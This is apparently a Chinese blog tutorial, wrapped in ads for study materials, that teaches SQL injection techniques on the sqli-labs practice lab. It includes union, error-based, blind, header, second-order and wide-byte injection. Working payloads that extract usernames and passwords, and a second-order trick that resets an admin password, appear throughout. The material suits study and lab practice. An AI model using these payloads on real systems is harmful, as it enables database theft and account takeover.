2024年网络安全最全【Web安全】SQL各类注入与绕过，2024年最新2024最新网络安全面试笔试题目分享

一、网安学习成长路线图

网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

二、网安视频合集

观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。

三、精品网安学习书籍

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。

四、网络安全源码合集+工具包

光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

1. 什么是SQL？

SQL结构化查询语言用于管理关系型数据库管理系统，SQL的范围包括数据插入、查询、更新和删除，数据库模式创建和修改，以及数据访问控制。所谓关系型数据库，就像一张表，一个数据库中有很多的表，每一张表可以存储不同的内容。在一张表中，有列名也就是每一列的属性名称，如姓名、地址等，我们选取数据时，只需要知道数据库名、表名、列名以及条件，即可选取想要的数据。在开始SQL注入之前，需要简单了解一下SQL的基本语法，可见菜鸟教程及其他博客，这里就不占用篇幅了。

菜鸟教程-SQL，怎么学习呢？其实只要理解如何简单地选择，插入，修改和删除等以及常用的关键字，ORDER BY、AND、OR、UNION、WHERE等、注释方式，limit，substr函数。

2. SQL注入简介

SQL注入是一种代码注入技术，用于攻击数据驱动的应用程序。在应用程序中，如果没有恰当的过滤，则可能使得恶意的输入导致服务器代码查询语句被恶意拼接，进一步使得数据库信息泄露。

先来举出SQL注入类型吧，常见的SQL注入类型有：联合注入、报错注入、堆叠注入、时间盲注、布尔盲注、二次注入、宽字节注入、XFF注入等。

3. 判断闭合

例如有下面几段SQL语句：

select \* from security where x=$id;
select \* from security where x=($id);
select \* from security where x='$id';
select \* from security where x=('$id');
select \* from security where x=(('$id'));
select \* from security where x="$id";
select \* from security where x=("$id");
select \* from security where x=(("$id"));

这几条是不同闭合方式的SQL语句，第一条是数字型注入，剩下的是字符型注入，它们都有不同的闭合方式——单引号闭合、单引号括号闭合等。$id是我们输入的值，我们输入id=1的话，第一条语句就为select * from security where x=1;，假如输入id=1“多了个单引号（以第一条和第六条为例），那么第一条语句就会报错，第六条也会报错因为多了个双引号；如果我们输入id=1" – #呢？第一条还是会报错，但是第六条不会报错，因为我们最后的SQL语句是select * from security where x=“1” – #";后面的一个双引号被注释掉了，这就是构造闭合。

4. 判断数字型还是字符型

?id=2-1 --+ 确定2和1的内容如果通过减号显示1的内容，那就是数字型输入。有时候这一杠会被过滤就换一种方法
?id=1' --+出现报错信息，根据报错信息可以判断原来有没有引号

?id=1' and '1'='1
?id=2' and '1'='1  判断有没有括号，因为有括号的话整体是1
剩下就是一些加单引号、双引号、括号、大括号，百分号的过程了，大括号和百分号比较少见。

刷sql-labs-master靶场习惯了就容易判断了。

闭合完成之后可以干嘛？当然是构造payload，例如（先不管它是做什么的）：

select * from database where id=‘1’ and updatexml(1,concat(‘~’,substr((select group_concat(username,0x3a,password) from users),1,100)),3) --+’

其中我们输入的内容是：1’ and updatexml(1,concat(‘~’,substr((select group_concat(username,0x3a,password) from users),1,100)),3) --+

总之，url后面是字符，那么可能就是字符型注入，url后面是数字，可能是字符型也可能是数字型，这需要测试。

4. 联合查询注入

联合查询的原理是利用了数据库的联合操作，将两个或多个查询的结果合并到一个结果集中。当注入成功时，原始查询和额外的查询的结果会合并在一起返回给应用程序，进而显示在页面上。

判断完闭合之后就是构造payload了，具体步骤就是获取表名、列名和数据，而这一节讲的联合查询的具体步骤就是：

• 判断有多少列，使用order by，这个关键字的作用是根据某一列进行排序，假设只有三列，你想要根据第四列排序，但是没有第四列呀！这就会报错或者说是不显示数据。

?id=1' order by 3 -- #

• 判断回显位union select，回显位是啥？查询操作将两个或多个查询的结果合并到一个结果集中。当注入成功时，原始查询和额外的查询的结果会合并在一起返回给应用程序，进而显示在页面上。当然要是的前者返回为空才会显示第二个查询的数据。之后页面会显示会显示是哪一个，进而在那一个数进行操作即可。

?id=-1' union select 1,2,3 -- #

• 获取表名，为什么不先获取数据名呢？因为可以使用database()函数代替：

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- #

group_concat()函数是将里面的多个行整合为一行即一个字符串，information_schema见这里，简单看一下column_name、table_name、table_schema对选取条件有帮助的就行。

• 获取列名

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'-- #

• 获取数据

?id=-1' union select 1,group_concat(username,0x3a,password),3 from users -- #

5. 报错注入

报错注入的定义就是利用了数据库的某一些机制，人为制造错误的条件，并且将查询结果附在报错信息之中，前提是有报错信息，查询php代码可知通常是print_r(mysql_error())。常见的报错函数有：floor、updatexml、extractvalue等。

• updatexml语法：三个参数，第一个string格式为XML对象的名称内容，第二个是Xpath格式，xpath差不多就是一个位置，第三个参数为更新的内容，如果第二个参数不是xpath格式则会报错。
• extractvalue语法：两个参数，第一个是string格式为xml文档对象的名称，第二个是xpath格式，报错原理也一样。

来看sqli-labs-master第一关，确定好闭合方式之后：

• 获取表名：

?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) --+

• 获取列名：

?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database())),3) --+

• 获取数据

?id=1' and updatexml(1,concat('~',substr((select group_concat(username,0x3a,password) from users),1,100)),3) --+

其中concat()函数为连接函数，连接波浪号和查询信息，波浪号常常使用0x7e代替，substr为截取函数，因为报错信息最多32位，或者使用limit分页函数。

6. 堆叠注入

堆叠注入的原理是利用了SQL查询语句中分号（;）的特性以及数据库执行多条SQL语句的能力。攻击者可以在注入点插入一个分号，然后在分号后面添加额外的SQL语句，使得数据库在执行查询时，会依次执行多条SQL语句。

以下是一个堆叠注入的简单例子，假设有一个登录页面，用户可以输入用户名和密码登录：

SELECT * FROM users WHERE username='$username' AND password='$password'

攻击者可以尝试在用户名和密码字段中进行注入，假设用户名字段存在注入漏洞。攻击者可以输入以下内容作为用户名：

' OR 1=1; INSERT INTO log (event) VALUES ('Successful login');

这个输入将会导致以下SQL语句被执行：

SELECT * FROM users WHERE username='' OR 1=1; INSERT INTO log (event) VALUES ('Successful login') AND password='$password'

这里的分号后面的部分是一个额外的SQL语句，它会被数据库执行，插入一条日志记录，表示成功登录，同时也可以修改别人的密码等操作，反正啥都行。

7. 布尔盲注与时间盲注

布尔盲注是一种利用布尔逻辑（即真和假）来推断数据库中数据的SQL注入技术。它通常用于无法直接获取数据的情况下，但可以通过不同的查询结果来推断出数据的存在与否，以及数据的属性。布尔盲注通过在SQL查询中插入条件语句来测试特定条件的真假，从而逐步推断出数据库中的信息。在进行练习时候，如果一个界面只有成功显示不成功显示、登录成功失败，没有报错没有回显时考虑，并且使用时候搭配burpsuite的intruder模块根据返回内容长度判断。

• 攻击者通过注入点插入条件语句，例如：?id=1’) and if(substr(database(),1,1)=‘c’,1,0) – #
• 根据返回结果（真或假），攻击者可以推断出密码的第一个字符是否为 ‘c’。如果返回真，表示密码的第一个字符是 ‘c’；如果返回假，表示密码的第一个字符不是 ‘c’。
• 通过不断更改条件语句中的参数，并观察返回结果，攻击者可以逐个字符地推断出密码的值。

爆表名：

?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e' --+

---

时间盲注是一种根据访问时间来推断数据库中数据的注入技术，它通常用于无法直接获取数据的情况下，并且无论参数对还是错界面都是一样的页面。比如说sqli-labs-master第九关：无论参数是否正确都显示You are in…，所以使用时间盲注。

常用的函数就是if()，第一个参数就是表达式，第二个第三个参数就是要执行的语句，如果表达式正确如下就会执行sleep(2)，而sleep()是延时函数，单位是秒。

?id=1" and if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(2),1) --+

8. 以上内容常用函数

substr(str,start,length)截取函数
第一个参数str为被截取的字符串，第二个参数start为开始截取的位置，第三个参数length为截取的长度。

left(str,length)截取函数，从左到右
第一个参数str为被截取的字符串。
第二个参数length为截取的长度。

right(str,legnth)截取函数，从右到左
第一个参数str为被截取的字符串。
第二个参数length为截取的长度。

ascii(char)转化为十进制的ascii码

length(str)返回长度

ord(char)ascii转换函数

if(cond，ture_result，False_result)比较函数
第一个表达式正确返回第二个，错误则返回第三个

9. HTTP头部注入

请求头	含义和作用	示例
Accept	告知服务器客户端能够接受的响应内容类型。	Accept: text/html, application/json
Accept-Language	告知服务器客户端可接受的语言类型。	Accept-Language: en-US, zh-CN;q=0.9
Accept-Encoding	告知服务器客户端可接受的内容编码方式，用于数据压缩传输。	Accept-Encoding: gzip, deflate
Host	指定请求的目标服务器的域名或IP地址和端口号。	Host: www.example.com:8080
Cookie	在HTTP请求中携带存储在客户端的Cookie信息，用于会话状态保持。例如，输入用户名和密码登录一个网站后，每次刷新和请求该站点其他页面，都会保持登录状态，这就是Cookie的功劳。	Cookie: session_id=123456; user_id=987654
Referer	表示当前请求的来源页面的URL，用于跟踪和统计。	Referer: https://www.example.com/page1
User-Agent	标识客户端应用程序或浏览器的信息，帮助服务器优化响应。	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type	指定请求体中的数据类型，用于POST请求等需要传递数据的请求。Content-Type的设置对于数据的正确解析和处理非常重要。例如，如果服务器期望接收JSON数据，而客户端却发送了普通文本数据，服务器可能无法正确解析数据。	Content-Type: application/json; charset=utf-8

大部分请求头都有可能存在注入，因为后端代码也会根据请求头查询数据。样例见，sqli-labs-master第18、19、20、21、22。

10. 二次注入

二次注入也称为存储型注入，就是将可能触发sql注入的字符存在数据库中，当再次调用这个恶意构造的字符就可以触发二次注入。

这里以sqli-labs-master第24关为例子。

• 代码一：实现了简单的用户注册功能，程序获取到GET参数username和参数password，然后将username和password拼接到SQL语句，使用insert语句插入数据库中。由于参数username使用addslashes进行转义（转义了单引号，导致单引号无法闭合），参数password进行了MD5哈希，所以此处不存在SQL注入漏洞。正常插入test’之后，数据库就有了test’这个用户。
• 当访问username=test’&password=123456时，执行的SQL语句为：

insert into users（\`username\`,\`password\`）values （'test\'','e10adc3949ba59abbe56e057f20f883e'）。

<?php
$con=mysqli\_connect("localhost", "root", "root", "sql");

if (mysqli\_connect\_errno()) {
   echo "数据库连接错误: " . mysqli\_connect\_error();
}
$username = $\_GET['username'];
$password = $\_GET['password'];
$result = mysqli\_query($con, "insert into users(`username`, `password`) values ('".addslashes($username)."','".md5($password)."')");
echo "新 id 为: " . mysqli\_insert\_id($con);
?>

• 代码二：在二次注入中，第二段中的代码如下所示，首先将GET参数ID转成int类型（防止拼接到SQL语句时，存在SQL注入漏洞），然后到users表中获取ID对应的username，接着到person表中查询username对应的数据。但是此处没有对$username进行转义，在第一步中我们注册的用户名是test’，此时执行的SQL语句为：

select * from person where `username`='test''

单引号被带入SQL语句中，由于多了一个单引号，所以页面会报错。

回到24题发现有很多代码。

• 分析login.php代码发现对于username和password使用了mysql_real_escape_string函数，这个函数会对单引号（'）、双引号（"）、反斜杠（\）、NULL 字符等加添反斜杠来进行转义，所以在登录界面框无法直接下手。

$username = mysql\_real\_escape\_string($\_POST["login\_user"]);
$password = mysql\_real\_escape\_string($\_POST["login\_password"]);

• 接着分析创建新用户的代码，在new_user.php中有form表单提交到login_create.php中，所以重点还是login_create.php，发现还是存在转义：

$username=  mysql\_escape\_string($\_POST['username']) ;
$pass= mysql\_escape\_string($\_POST['password']);
$re\_pass= mysql\_escape\_string($\_POST['re\_password']);

$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";

• 那就登录进去看一下，登录进去是一个修改密码的框，其中不需要填写账号密码，看一下代码：

$username= $\_SESSION["username"];
$curr\_pass= mysql\_real\_escape\_string($\_POST['current\_password']);
$pass= mysql\_real\_escape\_string($\_POST['password']);
$re\_pass= mysql\_real\_escape\_string($\_POST['re\_password']);

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr\_pass' ";

可以发现漏洞存在于此处，这一道题不是获取数据库而是获取admin的密码，所以我们可以构造一个admin’#的账号，虽然在注册部分单引号会被转义但数据库中并不会存在这个反斜杠，注册账号admin’#密码随便，于是就可以登录进去，然后再修改密码，其中的sql语句为：

$sql = "UPDATE users SET PASSWORD='你想要的密码' where username='admin'#' and password='$curr\_pass' ";

于是修改admin账号不需要原始密码。

11. 宽字节注入

宽字节注入指的是mysql数据库在使用GBK编码时（一般账号啥的能输入或显示中文的就是了），会认为两个字符是一个汉字，而且当我们输入单引号时，mysql会调用转义函数，将单引号变为’，其中\的十六进制是%5c,mysql的GBK编码会认为%df%5c是一个宽字节，也就是"運’，从而使单引号闭合(逃逸)，进行注入攻击

这里以sqli-labs-master第三十二关为例：

function check\_addslashes($string)
{
    $string = preg\_replace('/'. preg\_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg\_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg\_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
    return $string;
}

function strToHex($string)
{
    $hex='';
    for ($i=0; $i < strlen($string); $i++)
    {
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}
echo "Hint: The Query String you input is escaped as : ".$id ."<br>";
echo "The Query String you input in Hex becomes : ".strToHex($id). "<br>";

对于第一段代码，单引号、双引号和反斜杠都加上了一个反斜杠，我们试一下输入中文：

输入中文发现回显的是中文为gbk编码，所以我们可以使用宽字节注入，原理就是%df和反斜杠可以组成一个中文字符

?id=1%df' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) -- #

12. 双查询注入（报错注入一种）

首先这适合其他报错函数都过滤了但有报错信息，而且没有回显位的，比较少见所以这里给出链接。

【Double SQL Injection(双查询注入) | Mochazz’s blog】。

这里以sqli-labs-master第五关为例子。

首先这对于初学来说这个报错注入会比较难理解，我们先判断闭合方式：

?id=1' and '1'='1
?id=1' and '1'='2

通过上述语句可以知道这是单引号闭合，接下来判断注入类型，这里先试一下Union注入：

?id=1' order by 3 --+
?id=1' order by 4 --+

通过上述语句可以得到字段数为3，接下来判断回显位：

?id=1' and '1'='2' union select 1,2,3--+

通过这一段payload，发现并没有回显位，所以Union注入不可行，所以回到报错注入。

?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),3)--+

通过上述语句得到的结果为 XPATH syntax error: ‘~emails,referers,uagents,users’，之后过程省略。但是这一关的考点为报错注入中的双查询注入，我们假设updatexml()被过滤了，我们要使用双查询注入，关于双查询注入的文章【Double SQL Injection(双查询注入) | Mochazz’s blog】。

?id=1' union select 1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x3a,floor(rand(14)*2)) as a,count(*) from information_schema.columns group by a --+

通过上述语句得到Duplicate entry ‘:emails,referers,uagents,users:0’ for key ‘’，接着获取users的字段名

?id=1' union select 1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x3a,floor(rand(14)*2)) as a,count(*) from information_schema.columns group by a --+

学习路线：

这个方向初期比较容易入门一些，掌握一些基本技术，拿起各种现成的工具就可以开黑了。不过，要想从脚本小子变成黑客大神，这个方向越往后，需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容：

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！